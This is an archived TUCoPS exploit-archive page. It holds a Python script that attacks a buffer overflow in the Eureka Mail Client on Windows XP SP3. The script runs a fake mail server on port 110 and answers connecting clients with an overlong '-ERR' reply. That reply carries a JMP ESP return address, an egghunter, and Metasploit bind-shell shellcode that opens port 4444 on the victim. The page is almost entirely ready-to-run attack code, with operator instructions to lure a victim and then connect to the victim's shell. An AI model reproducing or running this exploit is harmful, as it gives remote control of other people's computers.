TUCoPS :: HP Unsorted E :: bt-22054.htm

Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition
Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition
Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition



#!/usr/bin/env python
###########################################################
#
# Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition
# Coded By: k4mr4n_st@yahoo.com
# Found By: k4mr4n (Securitylab.ir Member)
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
#
##########################################################

import sys, socket

# egghunter (32 bytes)
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # this is the egg: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=thread, LPORT=4444

bindshell = ("\xbb\xd3\x82\x28\x36\xd9\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x5e\x0f\x03\x5e\xdc\x60\xdd\xca\x0a\xed"
"\x1e\x33\xca\x8e\x97\xd6\xfb\x9c\xcc\x93\xa9\x10\x86\xf6\x41"
"\xda\xca\xe2\xd2\xae\xc2\x05\x53\x04\x35\x2b\x64\xa8\xf9\xe7"
"\xa6\xaa\x85\xf5\xfa\x0c\xb7\x35\x0f\x4c\xf0\x28\xff\x1c\xa9"
"\x27\xad\xb0\xde\x7a\x6d\xb0\x30\xf1\xcd\xca\x35\xc6\xb9\x60"
"\x37\x17\x11\xfe\x7f\x8f\x1a\x58\xa0\xae\xcf\xba\x9c\xf9\x64"
"\x08\x56\xf8\xac\x40\x97\xca\x90\x0f\xa6\xe2\x1d\x51\xee\xc5"
"\xfd\x24\x04\x36\x80\x3e\xdf\x44\x5e\xca\xc2\xef\x15\x6c\x27"
"\x11\xfa\xeb\xac\x1d\xb7\x78\xea\x01\x46\xac\x80\x3e\xc3\x53"
"\x47\xb7\x97\x77\x43\x93\x4c\x19\xd2\x79\x23\x26\x04\x25\x9c"
"\x82\x4e\xc4\xc9\xb5\x0c\x81\x3e\x88\xae\x51\x28\x9b\xdd\x63"
"\xf7\x37\x4a\xc8\x70\x9e\x8d\x2f\xab\x66\x01\xce\x53\x97\x0b"
"\x15\x07\xc7\x23\xbc\x27\x8c\xb3\x41\xf2\x03\xe4\xed\xac\xe3"
"\x54\x4e\x1c\x8c\xbe\x41\x43\xac\xc0\x8b\xf2\xea\x0e\xef\x57"
"\x9d\x72\x0f\x46\x01\xfa\xe9\x02\xa9\xaa\xa2\xba\x0b\x89\x7a"
"\x5d\x73\xfb\xd6\xf6\xe3\xb3\x30\xc0\x0c\x44\x17\x63\xa0\xec"
"\xf0\xf7\xaa\x28\xe0\x08\xe7\x18\x6b\x31\x60\xd2\x05\xf0\x10"
"\xe3\x0f\x62\xb0\x76\xd4\x72\xbf\x6a\x43\x25\xe8\x5d\x9a\xa3"
"\x04\xc7\x34\xd1\xd4\x91\x7f\x51\x03\x62\x81\x58\xc6\xde\xa5"
"\x4a\x1e\xde\xe1\x3e\xce\x89\xbf\xe8\xa8\x63\x0e\x42\x63\xdf"
"\xd8\x02\xf2\x13\xdb\x54\xfb\x79\xad\xb8\x4a\xd4\xe8\xc7\x63"
"\xb0\xfc\xb0\x99\x20\x02\x6b\x1a\x40\xe1\xb9\x57\xe9\xbc\x28"
"\xda\x74\x3f\x87\x19\x81\xbc\x2d\xe2\x76\xdc\x44\xe7\x33\x5a"
"\xb5\x95\x2c\x0f\xb9\x0a\x4c\x1a")

buff = ("\x41" * 710);
retn = ("\x53\x93\x42\x7e"); #JMP ESP USER32.DLL XPSP3
nops = ("\x90" * 218);
junk = ("\xcc" * 2000);
sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell);

print ("""
##########################################################
#
# Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3)
# Coded By: k4mr4n_st@yahoo.com
# Found By: k4mr4n (Securitylab.ir Member)
# Tested On: Windows XPSP3
# Note: This script sets up a fake SMTP server
# Note: Point the client to this address and check your mail
#
##########################################################
""")

try:
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.bind(('', 110))
 s.listen(1)
 print ("[*] Listening on port 110.")
 print ("[*] Have someone connect to you.")
 print ("[*] Type -c to exit.")
 conn, addr = s.accept()
 print '[*] Received connection from: ', addr

 while 1:
  conn.send(sploit)
 conn.close()
except:
 print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444")

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH